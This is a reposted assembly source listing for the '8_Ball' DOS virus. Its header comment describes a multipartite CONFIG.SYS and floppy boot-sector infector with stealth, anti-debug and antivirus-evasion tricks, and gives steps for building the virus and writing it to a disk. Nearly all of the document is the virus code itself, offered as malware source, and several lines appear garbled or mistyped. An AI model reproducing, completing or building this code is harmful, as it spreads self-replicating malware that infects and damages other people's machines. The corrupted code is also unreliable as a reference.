8ball源程式！！！ (轉)

8ball源程式！！！ (轉)[@more@]

 

designed by "Q" the misanthrope.

comment *

8_Ball is a multipartite momentarilly vo resident C:CONFIG.SYS infector

that creates ranly named INSTALL= programs and is an HMA stealth memory

resident floppy boot sector infector. Virus scanners will not be able to

scan for this virus because it does not infect executable files. The payload

is an anti-de routine that will blow the CMand still go memory resident

if debugged. It also will disable the keyboard key lock. It is an

improvement over Q_Ball. Also uses the PKLITE header confuser for TBAV and

AVP.

Example CONFIG.SYS:

BUFFERS=17

FILES=30

INSTALL=AOAN.MCO

tasm 8_ball /m2

tlink 8_ball

exe2bin 8_ball.exe 8_ball.

format a:/q/u

debug 8_ball.com

l 300 0 0 1

w 100 0 0 1

w 300 0 20 1

m 11c,2fe 100

rcx

1e2

w

q

*

.286

qseg segment byte public 'CODE'

assume cs:qseg, es:qseg, ss:nothing, ds:qseg

top: jmp short install

90h

db 'MSDOS5.0'

dw 512

db 1

dw 1

db 2

dw 224

dw 2880

db 0F0h

dw 9

dw 18

dw 2

com_install proc near

db "PK"

mov ax, 3506h

mov dx, next_part-com_install+0100h

int 21h

mov ah, 25h

int 21h

db 08dh, 0d3h

end_it: push es

pop ds

int 21h

int 20h

com_install endp

install proc near

push cs

mov si, bx

push bx

push cs

cld

pop ds

mov es, bx

cmp ptr ds:[0449h], 07h

je monochrome

push 0b800h

pop es

cmp word ptr es:[si+negative_1-top+01h], -1

monochrome: push es

push si

mov cx, offset previous_hook

pop di

push si

push cx

rep movsb

pop cx

pop si

call return_far

rep movsb

mov si, 1ah*04h

je already_res

movsw

movsw

mov word ptr ds:[si-02h], cs

mov word ptr ds:[si-04h], offset first_hook+7e00h-02h

already_res: push ds

pop es

re_get_boot: mov ax, 0201h

call set_cx_dx

return_far: retf

install endp

next_part proc near

pop dx

pop dx

mov dx,bx

pusha

negative_1: mov di, -1

push es

push ds

mov ax, 3501h

int 21h

cmp byte ptr es:[bx], 00h

org $-1

iret

mov al, 2eh

je go_mem_res

out 70h, ax

next_part endp

go_mem_res proc near

mov ax, 3540h

mov si, 0100h

int 21h

mov word ptr ds:[previous_hook-com_install+0100h], bx

mov word ptr ds:[previous_hook-com_install+0102h], es

mov ax, es

inc ax

mov ax, 4a02h

jz get_out

mov bx, 0200h

int 2fh

inc di

jz get_out

lea cx, word ptr ds:[si]

rep movsw

push es

lea dx, word ptr ds:[di+interrupt_40-com_install-0200h]

mov ax, 2540h

pop ds

int 21h

mov al,60h

out 64h,al

get_status: in al,64h

test al,02h

lnz get_status

mov al,4bh

out 60h,al

get_out: pop ds

pop es

popa

popf

jmp end_it

go_mem_res endp

install_name db 'INSTALL='

file_name db 'C:'

db 00h

dot equ $+3

crlf equ $+7

config_line db "c:config.sys",00

set_cx_dx proc near

mov bp, word ptr ds:[bx+11h]

shr bp, 04h

mov cx, word ptr ds:[bx+16h]

shl cx, 01h

add cx, bp

inc cx

sub cx, word ptr ds:[bx+18h]

mov dh, 01h

int 40h

retn

set_cx_dx endp

v_name db "8_Ball -=Q=-"

interrupt_21 proc near

pushf

pusha

push ds

push cs

pop ds

cmp ah, 4bh

je set_21_back

sub cx, cx

mov ax, 4301h

mov dx, offset config_line+7e00h-02h

int 18h

mov dl, low(offset file_name+7e00h-02h)

mov ah, 5ah

jc keep_trying

int 18h

mov bh, 3eh

xchg ax, bx

int 18h

mov ah, 41h

int 18h

mov cl, 05h

mov ax, 5b2eh

mov byte ptr ds:[dot+7e00h-02h], al

int 18h

mov bh, 40h

xchg ax, bx

mov dx, offset com_install+7c00h

mov ch, 02h

int 18h

mov ah, 3eh

int 18h

mov dl, low(offset config_line+7c00h)

mov ax, 3d42h

int 18h

xchg ax, bx

mov ax, 4202h

cwd

sub cx, cx

int 18h

mov word ptr ds:[crlf+7e00h-02h], 0a0dh

mov ah, 40h

mov dx, offset install_name+7e00h-02h

mov cl, low(crlf-install_name+02h)

int 18h

mov ah, 3eh

int 18h

set_21_back: lds dx, dword ptr ds:[previous_hook+7c00h]

mov ax, 2521h

int 18h

keep_trying: jmp pop_ds_and_all

interrupt_21 endp

next_line proc near

pop ax

add ax, -(return_point-com_install)

xchg ax, si

push ds

push es

pop ds

cmp word ptr ds:[bx+negative_1-top+01h], -1

je get_old_bs

mov ax, 0301h

pusha

call set_cx_dx

cld

mov cx, previous_hook-com_install

lea di, word ptr ds:[bx+com_install-top]

rep movs byte ptr es:[di], cs:[si]

mov word ptr ds:[bx], 0000h

org $-2

jmp $(install-top)

popa

int 40h

get_old_bs: push cs

call re_get_boot

pop ds

popa

popf

return_far_2: retf 02h

next_line endp

interrupt_40 proc near

cmp cx, 0001h

jne jne_far_jmp

cmp ah, 02h

jne jne_far_jmp

cmp dh, ch

jne_far_jmp: jne far_jmp

pushf

push cs

call far_jmp

jc return_far_2

pushf

pusha

call next_line

return_point label byte

interrupt_40 endp

org 001c2h

first_hook proc near

pushf

pusha

mov ax, 1200h

push ds

push es

cwd

int 2fh

inc al

mov ds, dx

mov si, 21h*04h

mov di, offset previous_hook+7c00h

jnz pop_it

les bx, dword ptr cs:[previous_hook+7e00h-02h]

mov ds:[si-((21h-1ah)*04h)+2], es

mov ds:[si-((21h-1ah)*04h)], bx

les bx,dword ptr ds:[si]

mov ds:[si-((21h-18h)*04h)+2], es

push cs

cld

mov ds:[si-((21h-18h)*04h)], bx

pop es

movsw

movsw

mov word ptr ds:[si-04h], offset interrupt_21+7c00h

mov word ptr ds:[si-02h], cs

pop_it: pop es

pop_ds_and_all: pop ds

popa

popf

first_hook endp

org 001fch

far_jmp proc near

sti

db 0eah

previous_hook: label double

far_jmp endp

boot_signature dw 0aa55h

qseg ends

end